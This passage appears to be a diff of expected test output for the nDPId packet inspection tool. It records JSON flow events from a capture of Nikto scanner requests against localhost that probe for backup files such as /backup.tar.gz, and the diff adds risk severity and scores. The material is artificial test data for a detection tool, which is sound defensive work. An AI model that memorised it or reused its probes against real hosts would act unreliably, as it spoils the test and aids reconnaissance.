 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277228,"pkt":"AAAAAAAAAAAAAAAACABFAAC9wfFAAEAGekd\/AAABfwAAAcRAH5ChSfl1EHb5\/IAYAED+sQAAAQEICp1m\/RSdZv0UR0VUIC8wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277229,"pkt":"AAAAAAAAAAAAAAAACABFAADB75lAAEAGTJt\/AAABfwAAAcRCH5BYYNcNJ8u6iIAYAED+tQAAAQEICp1m\/RWdZv0VR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277231,"pkt":"AAAAAAAAAAAAAAAACABFAADB77xAAEAGTHh\/AAABfwAAAcREH5CTV9cik40gf4AYAED+tQAAAQEICp1m\/RedZv0WR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277232,"pkt":"AAAAAAAAAAAAAAAACABFAADB9\/xAAEAGRDh\/AAABfwAAAcRGH5CWhs9n6ph7xIAYAED+tQAAAQEICp1m\/RidZv0YR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277233,"pkt":"AAAAAAAAAAAAAAAACABFAADB+aZAAEAGQo5\/AAABfwAAAcRIH5BuH8E5NSGMTIAYAED+tQAAAQEICp1m\/RmdZv0ZR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277235,"pkt":"AAAAAAAAAAAAAAAACABFAADF6elAAEAGUkd\/AAABfwAAAcRKH5Ao6tF83Ul6FYAYAED+uQAAAQEICp1m\/RudZv0aR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277236,"pkt":"AAAAAAAAAAAAAAAACABFAADFYRdAAEAG2xl\/AAABfwAAAcRMH5CsR1mJC42rtYAYAED+uQAAAQEICp1m\/RydZv0cR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277237,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/lsZAAEAGpXB\/AAABfwAAAcROH5CjIq5axoK2IoAYAED+swAAAQEICp1m\/R2dZv0dR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
